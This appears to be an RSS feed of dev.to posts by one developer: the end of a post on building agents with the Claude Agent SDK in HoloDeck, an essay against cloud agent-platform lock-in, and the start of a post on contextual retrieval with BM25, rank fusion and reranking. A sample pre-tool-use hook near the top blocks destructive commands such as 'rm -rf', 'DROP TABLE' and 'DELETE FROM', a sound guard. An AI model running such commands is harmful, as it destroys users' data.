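&lt;p&gt;A hook is just an executable: the SDK hands it a JSON event and reads a JSON decision back. As a rough sketch of the kind of pre-tool-use guard this YAML config could wire up (the field names here are illustrative assumptions, not the exact hook schema; check the hooks docs):&lt;/p&gt;

```python
import json

# Rough sketch of a pre-tool-use hook body: veto dangerous bash commands.
# The event/decision field names are illustrative assumptions; consult the
# hooks documentation for the exact input/output schema.
DANGEROUS = ("rm -rf", "DROP TABLE", "DELETE FROM")

def decide(event: dict) -> dict:
    command = event.get("tool_input", {}).get("command", "")
    if any(marker in command for marker in DANGEROUS):
        return {"decision": "block", "reason": f"refused: {command!r}"}
    return {"decision": "allow"}

# A real hook would read the event from stdin and print the decision:
event = {"tool_name": "Bash", "tool_input": {"command": "DELETE FROM users"}}
print(json.dumps(decide(event)))
```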

&lt;h3&gt;
  
  
  Agent Skills
&lt;/h3&gt;

&lt;p&gt;Skills are reusable prompt-based capabilities that can be invoked by name. Think of them as composable building blocks — a "summarize" skill, a "code-review" skill, a "translate" skill — that agents can mix and match.&lt;/p&gt;

&lt;h3&gt;
  
  
  Subagents (Multi-Agent Swarms)
&lt;/h3&gt;

&lt;p&gt;The SDK already supports parallel subagent execution. We'll expose this as a YAML pattern where you define a coordinator agent that spawns specialized worker agents. Swarm-style orchestration, configured in YAML.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;code&gt;holodeck serve&lt;/code&gt; for Claude Agents
&lt;/h3&gt;

&lt;p&gt;Right now, &lt;code&gt;holodeck serve&lt;/code&gt; only works with Semantic Kernel backends. We're adding Claude agent support so you can expose any &lt;code&gt;provider: anthropic&lt;/code&gt; agent as an HTTP API endpoint — same REST interface, same AG-UI compliance.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;code&gt;holodeck deploy&lt;/code&gt; with Claude
&lt;/h3&gt;

&lt;p&gt;Once &lt;code&gt;serve&lt;/code&gt; supports Claude, &lt;code&gt;deploy&lt;/code&gt; naturally follows. The deployment pipeline (Dockerfile generation, container build, cloud push) will use &lt;code&gt;serve&lt;/code&gt; as the entrypoint into the container. You just swap the provider in your YAML and the container runs a Claude agent instead of an SK agent — with all the security hardening options from the SDK baked in.&lt;/p&gt;

&lt;h3&gt;
  
  
  Human-in-the-Loop Approvals
&lt;/h3&gt;

&lt;p&gt;By combining &lt;code&gt;permission_mode: manual&lt;/code&gt; (or &lt;code&gt;acceptEdits&lt;/code&gt;) with hooks, you can build approval workflows where the agent pauses and waits for human confirmation before taking sensitive actions. Think: "the agent wants to run &lt;code&gt;DELETE FROM users&lt;/code&gt; — approve or deny?"&lt;/p&gt;

&lt;h3&gt;
  
  
  Custom Anthropic Endpoints
&lt;/h3&gt;

&lt;p&gt;Full support for routing through cloud providers — AWS Bedrock, Google Vertex AI, Azure Foundry — plus custom &lt;code&gt;ANTHROPIC_BASE_URL&lt;/code&gt; for self-hosted endpoints and Ollama. Run the same agent YAML against any compatible backend.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;I started building HoloDeck as a multi-backend platform because I thought you needed choice. And you do — for the transition period. But after building the Claude Agent SDK integration, I'm increasingly convinced it's the only agent runtime most teams need.&lt;/p&gt;

&lt;p&gt;It's a process, not a library. It manages its own tool loop. It speaks MCP natively. It has bash, file I/O, extended thinking, structured output, and subagents built in. It ships with real sandboxing — OS-level enforcement, not just string matching on commands. And you can &lt;a href="https://docs.ollama.com/integrations/claude-code" rel="noopener noreferrer"&gt;run it locally with Ollama&lt;/a&gt; if you want to experiment without an API key.&lt;/p&gt;

&lt;p&gt;The Semantic Kernel backend isn't going anywhere — it powers OpenAI and Azure workloads and that's still valuable. But for new agents? I'd start with the Claude Agent SDK every time.&lt;/p&gt;

&lt;p&gt;If you're building agents today, stop gluing together LangChain chains or wrestling with AutoGen graphs. Just define your agent in YAML, point it at Claude, and let the SDK do what it does best.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: my-agent
model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: oauth_token
instructions:
  inline: "You are a helpful assistant."
claude:
  bash:
    enabled: true
  file_system:
    read: true
    write: true
  max_turns: 10

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. That's the whole framework.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Check out &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck on GitHub&lt;/a&gt; and the &lt;a href="https://platform.claude.com/docs/en/agent-sdk/overview" rel="noopener noreferrer"&gt;Claude Agent SDK docs&lt;/a&gt; to get started.&lt;/em&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Take Back the Stack. Your Cloud Provider Doesn't Want You To.</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Sun, 08 Feb 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/take-back-the-stack-your-cloud-provider-doesnt-want-you-to-144h</link>
      <guid>https://dev.to/jeremiahbarias/take-back-the-stack-your-cloud-provider-doesnt-want-you-to-144h</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6vb6ecbzwumwcq6bsek.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6vb6ecbzwumwcq6bsek.jpg" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Take Back the Stack. Your Cloud Provider Doesn't Want You To.
&lt;/h1&gt;




&lt;p&gt;For the better part of a decade, I've watched organisations hand over layer after layer of their engineering stack to cloud providers. And every single time, the justification was the same: "We don't have the skills to build this ourselves." Infrastructure? Outsource it. Platforms? Managed service. Data pipelines? Let AWS handle it. ML? Definitely outsource that.&lt;/p&gt;

&lt;p&gt;And now it's happening again with AI agents. Azure has AI Foundry. AWS has Bedrock and AgentCore. Google has Vertex AI Agent Engine. The pitch is identical to every pitch before it: "Don't build this. Consume ours. We'll handle the hard parts."&lt;/p&gt;

&lt;p&gt;I'm tired of it. And for the first time, I think the excuse — "we can't build it ourselves" — is actually, provably, &lt;em&gt;wrong&lt;/em&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  How We Got Here
&lt;/h2&gt;

&lt;p&gt;I get it. The outsourcing made sense for a long time. Running data centres was expensive and painful. Managing Kubernetes at scale required a team most organisations couldn't hire. Building ML pipelines from scratch was a PhD-level exercise.&lt;/p&gt;

&lt;p&gt;So we moved to the cloud. Then we moved to managed services on the cloud. Then we moved to managed AI services on the cloud. Each step was rational. Each step also meant we understood less and less about our own systems.&lt;/p&gt;

&lt;p&gt;The progression looked something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"We can't run data centres." Fair enough. "We can't manage Kubernetes." OK, sure. "We can't build ML pipelines." Debatable, but fine. "We can't build AI agents." Hang on.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That last one is where I draw the line. Because the thing that changed — the thing that most organisations haven't fully clocked yet — is that building software just got mass-democratised in a way that makes most of those "we can't" excuses evaporate.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Agent Platform Gold Rush (And Why You Should Be Suspicious)
&lt;/h2&gt;

&lt;p&gt;Every major cloud provider is now racing to become the platform where your AI agents live. Let me spell out what that actually means.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Azure AI Foundry&lt;/strong&gt; — model catalogue, prompt management, agent orchestration, evaluation tooling. All inside Azure. All wired into Azure services. All making it progressively harder to leave Azure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AWS Bedrock AgentCore&lt;/strong&gt; — same play, different logo. Build your agents on AWS, connect them to your AWS data, orchestrate them with AWS primitives. Your agents become structurally dependent on AWS. That's not a bug; that's their business model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Google Vertex AI Agent Engine&lt;/strong&gt; — you see where this is going.&lt;/p&gt;

&lt;p&gt;Here's what bugs me. These aren't just hosting platforms. They're becoming the &lt;em&gt;control plane&lt;/em&gt; for your AI strategy. They decide what models you can use, how your agents are orchestrated, what telemetry you get, how your data flows. And once you've wired fifty agents into their proprietary service mesh, your switching costs aren't just high — they're existential.&lt;/p&gt;

&lt;p&gt;For a startup? Fine. Use the managed thing. Ship fast, worry about lock-in later. But if you're a large enterprise, a government agency, any organisation where your value comes from the systems you build and the data you hold — you're handing over the keys. Again.&lt;/p&gt;

&lt;p&gt;For organisations that need to meet regulatory requirements, and for government institutions that need to consider who their service providers are: &lt;strong&gt;THIS IS A MATERIAL RISK&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Something Changed and Most People Missed It
&lt;/h2&gt;

&lt;p&gt;While the cloud providers were building their agent hosting empires, something happened that completely rewrites the economics here.&lt;/p&gt;

&lt;p&gt;Claude Code. Codex. Cursor. Cline. Aider. Pick your flavour.&lt;/p&gt;

&lt;p&gt;These aren't your 2023 Copilot autocomplete toys. These are agentic coding assistants that &lt;em&gt;build entire systems&lt;/em&gt;. They reason about architecture. They scaffold applications. They debug, refactor, write tests, and iterate across entire codebases. I've been using Claude Code daily for months and it still catches me off guard how much it can do.&lt;/p&gt;

&lt;p&gt;Tasks that would've taken me a week — standing up a new service, wiring an API integration, building a deployment pipeline — now take an afternoon. Not because I'm cutting corners. Because the AI is doing 80% of the mechanical work and I'm doing the 20% that actually requires a brain: the architecture decisions, the domain logic, the "wait, that edge case will blow up in production" judgment calls.&lt;/p&gt;

&lt;p&gt;And this is the part that matters: &lt;strong&gt;the reason we outsourced all those engineering layers was because building them in-house was expensive.&lt;/strong&gt; You needed big teams. Deep expertise across a dozen domains. Months of runway.&lt;/p&gt;

&lt;p&gt;What if that's not true anymore?&lt;/p&gt;

&lt;h2&gt;
  
  
  You Don't Need a 10x Team. You Might Need Three People.
&lt;/h2&gt;

&lt;p&gt;I'm going to say something that'll annoy some people: the era of needing ten-person platform teams to build internal tooling is over. Or at the very least, the bar has dropped &lt;em&gt;dramatically&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;A single engineer who knows their domain and knows how to drive an AI coding assistant can now:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scaffold infrastructure-as-code for an entire deployment pipeline in a day&lt;/li&gt;
&lt;li&gt;Build a custom agent orchestration layer that's tailored to your actual needs&lt;/li&gt;
&lt;li&gt;Write, test, and ship services at a pace that would've required a team of five&lt;/li&gt;
&lt;li&gt;Automate the operational drudgery that used to eat an entire SRE team's week&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'm not saying fire your engineers; far from it. I'm saying the &lt;em&gt;shape&lt;/em&gt; of the team changes. You don't need ten people doing ten things. You need two or three people who deeply understand your organisation, your architecture, and your constraints — and who can use AI to move at a pace that wasn't physically possible before 2024.&lt;/p&gt;

&lt;p&gt;This is &lt;em&gt;especially&lt;/em&gt; true for the kind of work that cloud providers want you to outsource. Agent orchestration? Pattern-heavy glue code. AI agents eat that for breakfast. Data pipeline wiring? Same. Deployment automation? Same. All the stuff that used to justify a managed service because "we don't have the headcount" — your headcount just got a 5x multiplier.&lt;/p&gt;

&lt;p&gt;Some may say that outsourcing all of this to an AI agent provided by an AI lab is a material risk as well, and that's a fair point. But using AI coding agents to build your own internal platforms is a fundamentally different proposition from outsourcing your entire agent strategy to a third-party service. The former is about augmenting your internal capabilities, while the latter is &lt;strong&gt;about relinquishing control&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop Letting IT Gatekeep Developer Platforms
&lt;/h2&gt;

&lt;p&gt;OK, here's where I'm really going to step on some toes.&lt;/p&gt;

&lt;p&gt;If you're a large organisation thinking about this, your instinct is going to be: "Let's get IT to build a centralised platform." Don't. Please.&lt;/p&gt;

&lt;p&gt;I've lived through this movie. IT builds a "developer portal" (if you're lucky) that's actually a ticket queue with a React frontend. Need an environment? Raise a ticket. Need a database? Another ticket. Need a deployment slot? Ticket, two-week SLA, hope you weren't trying to ship something this quarter. By the time you're actually writing code, the business has moved on and someone's asking why "digital transformation" isn't delivering results.&lt;/p&gt;

&lt;p&gt;The starting point should be building &lt;em&gt;real&lt;/em&gt; developer platforms. Self-service. Automated. Opinionated where it matters, flexible where it doesn't. And here's the kicker — &lt;strong&gt;only developers will build what developers actually need.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Platform engineering is not an IT governance function. It's a software engineering discipline. The people building your internal platform need to be people who feel the pain of not having one. People who've waited three weeks for a staging environment and thought "I could build a better system than this in a weekend." With AI coding assistants, that thought is now literally true.&lt;/p&gt;

&lt;p&gt;Give a small, empowered team — even one or two devs — the mandate to build internal tooling. Give them Claude Code. Give them autonomy. Get IT out of the critical path for day-to-day development. Watch what happens.&lt;/p&gt;

&lt;h2&gt;
  
  
  Build the Moat Around What Actually Matters
&lt;/h2&gt;

&lt;p&gt;Here's the mental model I keep coming back to.&lt;/p&gt;

&lt;p&gt;Your organisation's moat is not its cloud infrastructure. It never was. Nobody ever won a competitive advantage because they had a really nice Kubernetes cluster. Your moat is your domain knowledge. Your data. Your processes. The software that encodes all of that into systems that work.&lt;/p&gt;

&lt;p&gt;Cloud infrastructure — provisioning VMs, managing databases, configuring load balancers — that's commodity toil. Important, but undifferentiated. It's exactly the kind of work AI agents are already good at handling.&lt;/p&gt;

&lt;p&gt;So here's what I think the play is:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Delegate the infrastructure toil to AI agents.&lt;/strong&gt; Use agentic coding assistants to automate your cloud operations. Let machines manage machines. This is what they're good at.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Build your agent platforms in-house.&lt;/strong&gt; Don't hand your agent orchestration to AI Foundry or Bedrock AgentCore. Use Claude Code to build your own. With one or two engineers driving AI, this is genuinely achievable now — and the result will be tailored to your domain, wired into your data, and owned by you. Not rented.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Spend your human engineering effort on what's actually unique to you.&lt;/strong&gt; The domain logic. The data models. The regulatory knowledge. The workflows that make your organisation yours. That's where engineers should be thinking, not fighting YAML configs for a managed service that doesn't quite do what you need.&lt;/p&gt;

&lt;p&gt;I'm not anti-cloud. I'm not suggesting anyone go rack servers. Use cloud compute, managed databases, managed networking — consume the commodity layers, absolutely. But stop outsourcing the &lt;em&gt;intelligence&lt;/em&gt; layer. Stop letting cloud providers become the operating system for your AI strategy. The tools to take it back exist today, right now, and the cost of doing it yourself just dropped by an order of magnitude.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Risk of Waiting
&lt;/h2&gt;

&lt;p&gt;Some organisations will read this and think "we're not ready." They'll wait. They'll commission a strategy paper. They'll form a committee. They'll wait for IT to assess the tools. They'll wait for a vendor to package it all up in a nice procurement-friendly bundle.&lt;/p&gt;

&lt;p&gt;And while they wait, they'll outsource the last engineering layers they had. They'll become fully dependent on platforms they don't understand, built by companies whose incentive is to keep them dependent for shareholder value. And when the pricing changes — and it always changes — they'll have zero internal capability to respond.&lt;/p&gt;

&lt;p&gt;The organisations that start now, even messily, even with a tiny team, even with imperfect first attempts — they'll build the muscle memory that matters. They'll discover that two engineers with AI coding assistants can build things that would have required twenty people three years ago.&lt;/p&gt;

&lt;p&gt;The cloud providers are betting you won't build. That the complexity will scare you off. That you'll keep paying rent on their platforms because it feels safer than trying.&lt;/p&gt;

&lt;p&gt;I think they're wrong. And I think more engineers are starting to feel the same way.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If you want to see what building these patterns looks like in practice, check out &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt; — it's my open-source agent experimentation platform where I'm putting my money where my mouth is.&lt;/em&gt;&lt;/p&gt;




</description>
    </item>
    <item>
      <title>RAG Is Dead. Long Live RAG. Or Is It?</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Sat, 07 Feb 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/rag-is-dead-long-live-rag-or-is-it-2h98</link>
      <guid>https://dev.to/jeremiahbarias/rag-is-dead-long-live-rag-or-is-it-2h98</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7yyxt1fdk9ayt91w15bi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7yyxt1fdk9ayt91w15bi.png" alt=" " width="800" height="436"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Heads up: this is a long one. Grab a coffee.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;There's a running joke in the AI engineering community: every six months, someone publishes a post declaring RAG dead. And every six months, the rest of us are still building retrieval pipelines, because the alternative — cramming a million pages into a context window and praying — doesn't actually work.&lt;/p&gt;

&lt;p&gt;So let me add to the pile. RAG is dead. Long live RAG. Or is it?&lt;/p&gt;

&lt;p&gt;Welcome to this rabbit hole.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we're covering
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;The Great Vector Gold Rush of 2023 (and why it mostly didn't work)&lt;/li&gt;
&lt;li&gt;GraphRAG's brief moment in the sun&lt;/li&gt;
&lt;li&gt;The Anthropic blog post that rewired my brain&lt;/li&gt;
&lt;li&gt;How I turned that into a tool for 800-page legislation (with reranking)&lt;/li&gt;
&lt;li&gt;Why structured data gets left out of every RAG conversation&lt;/li&gt;
&lt;li&gt;The agentic shift happening right now&lt;/li&gt;
&lt;li&gt;The information retrieval problem nobody actually solved&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The Great Vector Gold Rush
&lt;/h2&gt;

&lt;p&gt;Cast your mind back to 2023. ChatGPT had just lit the world on fire and suddenly every database vendor on the planet had a vector announcement to make. Postgres got &lt;code&gt;pgvector&lt;/code&gt;. Redis added vector similarity. Elasticsearch, MongoDB, Supabase — everyone scrambled to bolt on approximate nearest neighbour search like it was the new JSON column.&lt;/p&gt;

&lt;p&gt;And enterprise teams took the bait. The playbook was dead simple:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Take your documents&lt;/li&gt;
&lt;li&gt;Chunk them naively (every 500 tokens, maybe with some overlap)&lt;/li&gt;
&lt;li&gt;Embed them with &lt;code&gt;text-embedding-ada-002&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Stuff them into a vector store&lt;/li&gt;
&lt;li&gt;Wire up a chatbot&lt;/li&gt;
&lt;li&gt;Ship it. Call it "AI-powered knowledge management"&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Sound familiar? Yeah. Everyone did this.&lt;/p&gt;

&lt;p&gt;I watched it play out firsthand. Business teams at my organisation (I work for the Federal Government) would come to us, exasperated:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"We tried using Copilot with SharePoint. We even ingested everything into Dataverse. It can't seem to understand PDFs with tables! Also it hallucinated like nobody's business. Precision and recall scores were abysmal. The whole thing turned into unusable slop."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The frustration was real. The promise of "just ask your documents anything" crumbled the moment you needed an actual correct answer from an 800-page piece of legislation. And the root cause was always the same: &lt;strong&gt;nobody was taking the information retrieval problem seriously.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;They were treating retrieval as a checkbox — "we have a vector store, done" — when it's actually the hardest part of the whole pipeline.&lt;/p&gt;

&lt;h2&gt;
  
  
  GraphRAG and the Hype That Fizzled
&lt;/h2&gt;

&lt;p&gt;Then came GraphRAG. Microsoft Research published a paper, the community got excited, and suddenly everyone was building knowledge graphs out of their document corpora. The idea had elegance: model entities and relationships explicitly, then traverse the graph during retrieval to capture multi-hop reasoning.&lt;/p&gt;

&lt;p&gt;In practice? The extraction was brittle. The graphs were noisy. The latency was punishing. And for most use cases — "find me the section about reporting requirements in this regulation" — a well-built keyword index would have done the job in milliseconds.&lt;/p&gt;

&lt;p&gt;GraphRAG didn't die, exactly. It found its niche in certain analytical workloads. But as a general-purpose retrieval upgrade for enterprise document search? It fizzled. The gap between research demo and production system was a chasm.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Blog Post That Changed Everything (For Me)
&lt;/h2&gt;

&lt;p&gt;In late 2024, Anthropic's engineering team quietly published a blog post called &lt;a href="https://www.anthropic.com/engineering/contextual-retrieval" rel="noopener noreferrer"&gt;Contextual Retrieval&lt;/a&gt;. No fanfare. No "paradigm shift" language. Just a straightforward technique that made me stop what I was doing and redesign an entire tool.&lt;/p&gt;

&lt;p&gt;The core insight is embarrassingly simple: &lt;strong&gt;when you chunk a document, you destroy context. So put the context back before you embed.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's what I mean. Traditional RAG takes a chunk like &lt;em&gt;"The Administrator shall submit a report within 30 days"&lt;/em&gt; and embeds it in isolation. Which administrator? Which report? 30 days from what? The chunk lost all of that when it got ripped out of the document.&lt;/p&gt;

&lt;p&gt;Contextual Retrieval takes the same chunk and prepends a short, LLM-generated summary of where it sits in the document: &lt;em&gt;"This chunk is from Title IV, Chapter 2, Section 403(b) of the Clean Air Act, which covers administrative reporting requirements."&lt;/em&gt; Then you embed the whole thing.&lt;/p&gt;

&lt;p&gt;That's it. That's the technique.&lt;/p&gt;
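&lt;p&gt;As a sketch (my paraphrase of the technique, not Anthropic's code), the indexing step is just string assembly around one LLM call. Here &lt;code&gt;generate_context&lt;/code&gt; is a stand-in for that call, which in the real pipeline sees the full document via a cached prompt:&lt;/p&gt;

```python
# Sketch of the contextual-embedding indexing step (illustrative, not
# Anthropic's code). generate_context stands in for the LLM call that, given
# the full document, writes a short preamble situating the chunk.

def generate_context(document_title: str, section_path: str, chunk: str) -> str:
    """Placeholder for the LLM call that situates a chunk in its document."""
    return f"This chunk is from {section_path} of {document_title}."

def contextualize(document_title: str, section_path: str, chunk: str) -> str:
    """Prepend the generated context; the combined text is what gets embedded."""
    preamble = generate_context(document_title, section_path, chunk)
    return f"{preamble}\n\n{chunk}"

combined = contextualize(
    "the Clean Air Act",
    "Title IV, Chapter 2, Section 403(b)",
    "The Administrator shall submit a report within 30 days",
)
# Both the embedding model and the BM25 index receive `combined`, not the raw chunk.
```

&lt;p&gt;The raw chunk alone never reaches an index; every downstream representation is built from the contextualized text.&lt;/p&gt;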

&lt;h3&gt;
  
  
  The Pipeline
&lt;/h3&gt;

&lt;p&gt;Let me draw it out, because this is where it gets interesting — Anthropic doesn't just add context to embeddings. They build a &lt;strong&gt;hybrid index&lt;/strong&gt; that combines vector search and BM25 keyword search, blended with Reciprocal Rank Fusion. The full pipeline looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  CONTEXTUAL RETRIEVAL PIPELINE (Anthropic)
═══════════════════════════════════════════════════════════════════════

  INDEXING PHASE
  ──────────────

  Full Document
       │
       ▼
  ┌─────────────────────────────────────┐
  │          Chunk Document             │
  │  (split into semantic chunks)       │
  └──────────────────┬──────────────────┘
                     │
          ┌──────────┴──────────┐
          │  For each chunk...  │
          ▼                     ▼
  ┌───────────────┐    ┌────────────────────────────┐
  │  Raw Chunk    │    │  Full Document + Chunk      │
  │               │───▶│         ↓                   │
  │  "The Admin   │    │  LLM generates context:     │
  │   shall       │    │  "This chunk is from        │
  │   submit a    │    │   Section 403(b) of the     │
  │   report      │    │   Clean Air Act, Title IV,  │
  │   within      │    │   covering administrative   │
  │   30 days"    │    │   reporting requirements."  │
  │               │    └─────────────┬──────────────┘
  └───────────────┘                  │
                                     ▼
                     ┌───────────────────────────────┐
                     │     Contextualized Chunk       │
                     │  "Section 403(b), Clean Air    │
                     │   Act, Title IV, admin         │
                     │   reporting. The Admin shall   │
                     │   submit a report within       │
                     │   30 days"                     │
                     └───────────────┬───────────────┘
                                     │
                    ┌────────────────┴────────────────┐
                    │                                  │
                    ▼                                  ▼
          ┌─────────────────┐              ┌─────────────────┐
          │  Embed (dense)  │              │  Index (BM25)   │
          │  via model      │              │  keyword index  │
          └────────┬────────┘              └────────┬────────┘
                   │                                │
                   ▼                                ▼
          ┌─────────────────┐              ┌─────────────────┐
          │  Vector Index   │              │  BM25 Index     │
          │  (semantic)     │              │  (lexical)      │
          └─────────────────┘              └─────────────────┘


  QUERY PHASE
  ───────────

  User Query: "What are the reporting requirements?"
       │
       ├──────────────────────────────┐
       │                              │
       ▼                              ▼
  ┌──────────────┐           ┌──────────────┐
  │ Vector Search│           │ BM25 Search  │
  │ (semantic    │           │ (keyword     │
  │  similarity) │           │  matching)   │
  └──────┬───────┘           └──────┬───────┘
         │                          │
         │  rank_1, rank_2, ...     │  rank_1, rank_2, ...
         │                          │
         └────────────┬─────────────┘
                      │
                      ▼
         ┌────────────────────────┐
         │  Reciprocal Rank       │
         │  Fusion (RRF)          │
         │                        │
         │  score(d) = Σ 1/(k+r)  │
         │  where k=60, r=rank    │
         │                        │
         │  Merges both result    │
         │  sets into one ranked  │
         │  list                  │
         └───────────┬────────────┘
                     │
                     ▼
         ┌────────────────────────┐
         │  Reranker (optional)   │
         │  Re-scores top-N       │
         │  for final ordering    │
         └───────────┬────────────┘
                     │
                     ▼
         ┌────────────────────────┐
         │  Top-K chunks → LLM   │
         │  for generation        │
         └────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the key thing most people miss: &lt;strong&gt;it's not just contextual embeddings.&lt;/strong&gt; The real power comes from the hybrid approach — vector search catches the semantic intent ("reporting requirements") while BM25 catches the exact terms ("Section 403(b)"). RRF merges both ranked lists so you get the best of both worlds without having to tune a linear combination weight.&lt;/p&gt;
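&lt;p&gt;The fusion step itself is only a few lines. Here's a minimal RRF merge matching the formula in the diagram — rank-based, so the raw scores from each engine never need to be comparable:&lt;/p&gt;

```python
# Minimal Reciprocal Rank Fusion: merge the vector and BM25 result lists with
# score(d) = sum over lists of 1 / (k + rank), k = 60, ranks starting at 1.

def rrf_merge(ranked_lists: list[list[str]], k: int = 60) -> list[str]:
    scores: dict[str, float] = {}
    for ranked in ranked_lists:
        for rank, doc_id in enumerate(ranked, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

vector_hits = ["chunk_403b", "chunk_201a", "chunk_intro"]   # semantic ranking
bm25_hits   = ["chunk_403b", "chunk_defs", "chunk_201a"]    # keyword ranking
merged = rrf_merge([vector_hits, bm25_hits])
# chunk_403b tops both lists, so it wins regardless of each engine's raw score scale.
```

&lt;p&gt;A document that appears in both lists accumulates score from each, which is exactly why agreement between the two modalities floats a result to the top.&lt;/p&gt;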

&lt;h3&gt;
  
  
  The Numbers
&lt;/h3&gt;

&lt;p&gt;The technique is simple; the results are anything but:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Failure Rate&lt;/th&gt;
&lt;th&gt;Reduction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Baseline (naive RAG)&lt;/td&gt;
&lt;td&gt;5.7%&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;+ Contextual Embeddings&lt;/td&gt;
&lt;td&gt;3.7%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-35%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;+ Contextual Embeddings + BM25 (RRF)&lt;/td&gt;
&lt;td&gt;2.9%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-49%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;+ All of the above + Reranking&lt;/td&gt;
&lt;td&gt;1.9%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-67%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;From 5.7% down to 1.9%. That's not a typo — &lt;strong&gt;a 67% reduction in retrieval failures&lt;/strong&gt; just by preserving context and combining search modalities. And the cost? Roughly a dollar per million document tokens with prompt caching. In a world where a single hallucinated legal citation can cost a business real money, that's essentially free.&lt;/p&gt;

&lt;p&gt;What struck me wasn't just the effectiveness — it was the &lt;em&gt;simplicity&lt;/em&gt;. No graph construction. No elaborate multi-agent retrieval choreography. Just: understand your document's structure, preserve it through the chunking process, use both vector AND keyword search, and let the fusion algorithm sort it out.&lt;/p&gt;

&lt;h2&gt;
  
  
  From Insight to Implementation: The Hierarchical Document Tool
&lt;/h2&gt;

